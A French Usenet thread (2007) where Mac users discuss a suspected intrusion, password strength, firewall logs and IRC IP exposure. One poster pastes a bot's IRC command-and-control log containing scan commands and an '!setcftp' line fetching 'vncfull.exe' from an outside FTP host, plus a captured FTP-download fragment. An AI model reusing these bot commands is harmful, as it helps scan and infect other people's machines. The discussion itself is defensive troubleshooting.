Un Virus ?

Jacques Perrocheau <jperrocheau@mac.com.invalid> wrote:

Plutôt que d'installer des multiples couches de préservatifs, plus ou
moins facile à paramétrer, tu pourrais simplement activer le firewall de
Mac OS X, au cas où tu utilises l'Airport. Dans ton cas le plus
important est de paraméter le firewall de ton routeur.

En plus de ce que tu dis, plein de bon sens dureste, je rapelles que le
problème de base était l'absence de mot de passe.

Et qu'on avait accès à la machine pour - par exemple - y mettre un
keylogger (un truc qui sert entre autre à récupérer les mots de passe).

Selon moi dans un cas comme ça en plus de Little Snitch et du reste,
un reset de tous les mots de passe du mac et tout particulièrement des
mot de passes enregistrés dans le keychain, comme les comptes banquaires
ou itms, s'impose.

Et pour bien faire, ce serait pas mal que les nouveaux passwd soient
sérieux. Perso j'utilises pwgen pour générer des mots de passe
aléatoires mais n'importe quel password alpha-numérique autre que
Ricardo01 devrait le faire.

--
Nicolas

Nicolas MICHEL <Nicolas.MICHEL@BonBon.net> wrote:

Et pour bien faire, ce serait pas mal que les nouveaux passwd soient
sérieux. Perso j'utilises pwgen pour générer des mots de passe
aléatoires mais n'importe quel password alpha-numérique autre que
Ricardo01 devrait le faire.

quelqu'un avait donné ici la chaîne suivant à saisir dans le terminal
pour générer des mots de passe solides et aléatoires

openssl rand -base64 8

...que je trouve bien pratique. Qu'il en soit encore remercié !

--
Gérald

Gerald@alussinan.org (Gerald) écrivait :

Nicolas MICHEL <Nicolas.MICHEL@BonBon.net> wrote:

Et pour bien faire, ce serait pas mal que les nouveaux passwd soient
sérieux. Perso j'utilises pwgen pour générer des mots de passe
aléatoires mais n'importe quel password alpha-numérique autre que
Ricardo01 devrait le faire.

quelqu'un avait donné ici la chaîne suivant à saisir dans le terminal
pour générer des mots de passe solides et aléatoires

openssl rand -base64 8

...que je trouve bien pratique. Qu'il en soit encore remercié !

Pas si solides que ça : l'alphabet de sortie du base64 est un peu
limité (64 caractères seulement).

--
Erwan

Gerald@alussinan.org (Gerald) écrivait :

Nicolas MICHEL <Nicolas.MICHEL@BonBon.net> wrote:

Et pour bien faire, ce serait pas mal que les nouveaux passwd soient
sérieux. Perso j'utilises pwgen pour générer des mots de passe
aléatoires mais n'importe quel password alpha-numérique autre que
Ricardo01 devrait le faire.

quelqu'un avait donné ici la chaîne suivant à saisir dans le terminal
pour générer des mots de passe solides et aléatoires

openssl rand -base64 8

...que je trouve bien pratique. Qu'il en soit encore remercié !

Pas si solides que ça : l'alphabet de sortie du base64 est un peu
limité (64 caractères seulement), donc on a ici 2^48 possibilités, ce
qui est faible (en dessous de 2^64 on considère que la force brute est
faisable).

--
Erwan

On Mon, 5 Mar 2007 10:41:14 +0100, Nicolas.MICHEL@BonBon.net (Nicolas
MICHEL) wrote:

Tu veux parler de cet OS, winturc XP stupid home user, qui crée par
défaut un utilisateur "admin" sans mots de passe ?
Non accessible de l'extérieur, mais il est vrai que ça facilite

furieusement les intrusions physiques :-)))))

Bin oui, c'est super sécurisé M$ :>
Tu vas rire, mais quand tu parles de ça sur les NG M$, tu te fais

regarder comme un extra-terrestre par les participants et les MVPs
(MVP = Microsoft Valuable Professional = brave retraité ou étudiant ou
mère de famille utilisateur de Win auquel MS offre un abonnement MSDN,
en échange de son apport de support gratuit sur les ng microsoft.*)
Parce que tu vois, pour eux, au contraire, c'est une sécurité.
Je t'explique : des fois que tu oublierais le pass de ton compte, ben
le compte admin sans mot de pass est là pour te sauver.
Véridique...
--
Nina

Et pour clore le sujet, je viens de m'infecter pas à l'insu de mon
plein gré du tout avec un des trucs trouvés sur le FTP en question.
Dans la seconde qui suit le lancement du programme (qui n'était hier
pas reconnu par la majorité des anti-virus), ma bécane va causer à un
japonais et ils se racontent ça :

NICK L1-tn0o
USER yakrtfqjm "fo9.net" "lol" :yakrtfqjm

:expozed.gov 001 L1-tn0o :Welcome to the Internet Relay Chat Network, L1-tn0o
:expozed.gov 002 L1-tn0o :Your host is expozed.gov, running version 1.2.1546
:expozed.gov 003 L1-tn0o :This server was created Mar 1 2007 at 05:34:54 g( (Serial # 00-00-00)
:expozed.gov 004 L1-tn0o expozed.gov IRCXPRO1.2 acdefghiknoprstwxyzACEFGIJLPRS abdefghijklmnopqrstuvwxyzACEFIKLMOPT
:expozed.gov 005 L1-tn0o IRCX CHANTYPES=%#&+ MODES=6 NOQUIT SAFELIST WALLCHOPS NICKLEN% MAXCHANNELS=6 SILENCE0 WATCH8 :are available on this server
:expozed.gov 422 L1-tn0o :MOTD Not Present
:L1-tn0o MODE L1-tn0o :+ir
:expozed.gov 475 L1-tn0o #dbot :Cannot join channel (+k)

JOIN #dbot lock

:L1-tn0o!~yakrtfqjm@82.224.20.184 JOIN :#dbot
:expozed.gov 332 L1-tn0o #dbot :!scan 10 1 b 2 1 201.x.x.x !patch -s !bk 30 -s !setcftp ftp.hypermart.net 21 joh joh vncfull.exe
:expozed.gov 353 L1-tn0o @ #dbot :L1-tn0o
:expozed.gov 366 L1-tn0o #dbot :End of /NAMES list
:#dbot PRIVMSG #dbot :Leave Topic Alone!

PRIVMSG #dbot :Scanning: 201.x.x.x, 10 threads. Using CFTP.
PING :expozed.gov
PONG expozed.gov
JOIN #dbot lock

:expozed.gov 927 L1-tn0o #dbot :Already in the channel.

Et ensuite mon PC commence à faire ce qu'on lui a dit : scanner à fond
les manettes 201.0.0.0/8, direction port 5900.
Je ne l'ai pas laissé tourner assez longtemps pour voir ce qu'il se
passait quand il tombait sur une machine vulnérable, hein... ;->>>>

Un point positif : la merde est très facile à enlever.
On vit une époque formidable.
--
Nina

In article <9ddhu2lcaeao6507hhqtbg410drlhainl9@4ax.com>,
Nina Popravka <Nina@nospam> wrote:

On Fri, 02 Mar 2007 19:34:28 -0400, RiGuad
<RiGuad@KkBoodin.wanadoo.fr> wrote:

Mon Mac était alors connecté au Net.
Avec un machin IRC lancé en tâche de fond ?

et que ne feras pas un netstat -a,

puis posteras le résultat ici, ça sera difficile de dire quoi que ce
soit.
Dis moi comment faire ca , stp.

Terminal, netstat -a

j'ai une préférence pour netstat -alnf inet

patpro

--
http://www.patpro.net/

On Mon, 05 Mar 2007 18:43:58 +0100, patpro ~ patrick proniewski
<patpro@boleskine.patpro.net> wrote:

j'ai une préférence pour netstat -alnf inet

Sûrement, mais je suis une dame âgée windowsienne, et je n'ai pas
encore réussi à mémoriser les paramètres de ps et ls.
Alors pour netstat, va falloir attendre 2008, je crains :-)
(je pense que je vais faire des fiches...)
--
Nina

Bon , ben je reviens sur la ligne de front...

Concernant le sujet des preservatifs (si, si...) j'ai desactivé celui du
Mac parce qu'il ne parle que des connections sortantes mais pas
entrantes, desactivé celui de mon modem routeur TrendNet TEW-435BRM,
parce qu'il ne cause qu'anglais , et l'anglais et moi quand il s'agit de
sujets pointus, ca fait trois, j'ai quitté VNC le temps d'etre sûr de
mes acces entrants, parce que cette histoire m'a bien fait flipper,
et... Je me suis attelé a l'etude de NetBarrier X4 dans sa version 10.4.1.

En une matinée, l'historique de NetBarrier me dis ceci :
-------------------
05/03/2007 15:30:23 88.168.97.111 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 15:30:20 88.168.97.111 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 15:28:18 88.87.193.248 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 15:28:15 88.87.193.248 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 15:27:21 194.30.160.81 Blocage d'une connexion entrante TCP
eDonkey Client
05/03/2007 15:27:20 194.213.0.10 Blocage d'une connexion entrante TCP
eDonkey Client
05/03/2007 15:27:18 194.30.160.81 Blocage d'une connexion entrante TCP
eDonkey Client
05/03/2007 15:27:17 194.213.0.10 Blocage d'une connexion entrante TCP
eDonkey Client
05/03/2007 15:17:53 220.133.98.159 Blocage d'une connexion entrante TCP
HTTP - web service alternate
05/03/2007 15:16:13 220.133.98.147 Blocage d'une connexion entrante TCP
HTTP - web service alternate
05/03/2007 15:14:39 220.133.98.113 Blocage d'une connexion entrante TCP
HTTP - web service alternate
05/03/2007 15:13:23 84.103.92.231 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 15:13:20 84.103.92.231 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 14:40:47 81.248.154.72 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 14:35:13 81.248.195.207 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 14:35:11 81.248.195.207 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 14:32:39 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 14:32:36 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 14:27:06 211.100.33.61 Blocage d'une connexion entrante TCP
Port 8000
05/03/2007 14:27:03 211.100.33.61 Blocage d'une connexion entrante TCP
Port 8000
05/03/2007 14:19:07 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 14:19:04 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:59:36 62.183.86.66 Blocage d'une connexion entrante TCP
Port 4899
05/03/2007 13:54:12 80.32.178.97 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:54:06 80.32.178.97 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:54:03 80.32.178.97 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:48:55 209.120.245.115 Blocage d'une connexion entrante
TCP MySQL
05/03/2007 13:48:52 209.120.245.115 Blocage d'une connexion entrante
TCP MySQL
05/03/2007 13:43:07 61.236.145.121 Blocage d'une connexion entrante TCP
Microsoft SQL Server
05/03/2007 13:36:51 88.87.193.248 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:36:48 88.87.193.248 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:34:50 81.241.77.118 Blocage d'une connexion entrante TCP
Port 2967
05/03/2007 13:28:41 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:28:39 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:28:02 66.16.198.33 Blocage d'une connexion entrante TCP
Port 4899
05/03/2007 13:19:42 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:19:40 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:12:14 81.248.177.62 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:12:11 81.248.177.62 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:02:03 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 13:02:00 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:47:48 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:47:45 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:46:11 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:46:08 81.248.90.177 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:43:38 81.198.15.24 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:43:35 81.198.15.24 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:39:26 81.248.177.62 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:39:26 81.248.177.62 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:39:23 81.248.177.62 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:35:25 90.13.165.129 Blocage d'une connexion entrante TCP
Port 26661
05/03/2007 12:35:19 90.13.165.129 Blocage d'une connexion entrante TCP
Port 26661
05/03/2007 12:35:16 90.13.165.129 Blocage d'une connexion entrante TCP
Port 26661
05/03/2007 12:22:34 125.225.110.90 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:22:31 125.225.110.90 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:18:37 213.22.171.77 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 12:18:34 213.22.171.77 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 11:37:23 81.248.248.253 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 11:37:20 81.248.248.253 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 09:58:47 90.31.199.36 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 09:58:44 90.31.199.36 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 09:51:12 211.218.38.109 Blocage d'une connexion entrante TCP VNC
05/03/2007 09:51:09 211.218.38.109 Blocage d'une connexion entrante TCP VNC
05/03/2007 09:47:10 90.31.106.175 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 09:47:06 90.31.106.175 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 09:05:18 90.31.106.175 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 09:05:15 90.31.106.175 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
05/03/2007 08:26:52 90.31.106.175 Blocage d'une connexion entrante TCP
SMB/CIFS - Windows file service
--------------

Je note qu'il est question d'eDonkey, appli que je n'ai pas sur mon Mac,
de VN, ce qui rejoint le concept d'attaque par VNC, mais tout de meme...
Nina me disait que je ne suis pas visé et tout cela est d'une grande
banalité sur le Web...Web que je pratique depuis 8 ans , et je n'ai
jamais eu ces phenomènes de scripts qui me gachent la vie.

Encore a l'instant, j'ouvre NetBarrier qq secondes, et... :
-------
(sySTE?ROOT5£SYSTE?"é`c,d:exec,d =c echo open forsqle:serveftp:net é& ::
IK 7ECHO USER ROKO SYFREDI //
--------
Ceci n'est qu'une partie , je n'ai pas pu tout chopper...
C'est quoi ces plans eDonkey et Roko syfredi ???

De plus je me dis que si un tel trafic vers mon Mac est présent , cela
doit nuire a ma bande passante, d'autant que je trouve mes connections
tres lentes depuis un mois.

Par ailleurs, Nina... quand tu dis...
----
Et ensuite mon PC commence à faire ce qu'on lui a dit : scanner à fond
les manettes 201.0.0.0/8, direction port 5900.
Je ne l'ai pas laissé tourner assez longtemps pour voir ce qu'il se
passait quand il tombait sur une machine vulnérable, hein... ;->>>>

Un point positif : la merde est très facile à enlever.
------
"tres facile a enlever" tu te deconnectes du Net pour couper l'action
en cours? tu fais comment ?.

Bref, je me demande pourquoi j'ai ces phenomenes que je n'avais pas
avant et je ne vois toujours pas comment les arreter, autrement qu'en
demandant a NetBarrier de stopper les connections entrantes, ce qui
d'ailleurs me fait dire que je n'ai pas un virus déposé sur le disque
dur de mon Mac, mais que ce sont la des attaques externes permanentes.

Et pour clore le sujet, je viens de m'infecter pas à l'insu de mon
plein gré du tout avec un des trucs trouvés sur le FTP en question.
Dans la seconde qui suit le lancement du programme (qui n'était hier
pas reconnu par la majorité des anti-virus), ma bécane va causer à un
japonais et ils se racontent

Ceci confirme tout de meme que ca n'a pas l'air d'etre courant, ces
attaques sur des ordis de particuliers...

A propos d'autre chose...Parlant de ce sujet dans un salon IRC avec un
interlocuteur habituel, alors que j'etais sous Snak, et lui sous mIRC,
ce mecapc m'a fait la demo qu'il pouvait, en live, obtenir mon adresse
IP, pendant le tchat sous IRC.

Ca m'a scié, et bien sur, ne dérogeant pas au profil des mecapc frimeurs
comme c'est pas racontable, je n'ai pas eu d'explication de sa part.

Comment est il possible de recueillir l'adresse IP d'un interlocuteur
alors qu'on a un dialogue sous IRC avec lui ?

Merci de m'eclairer...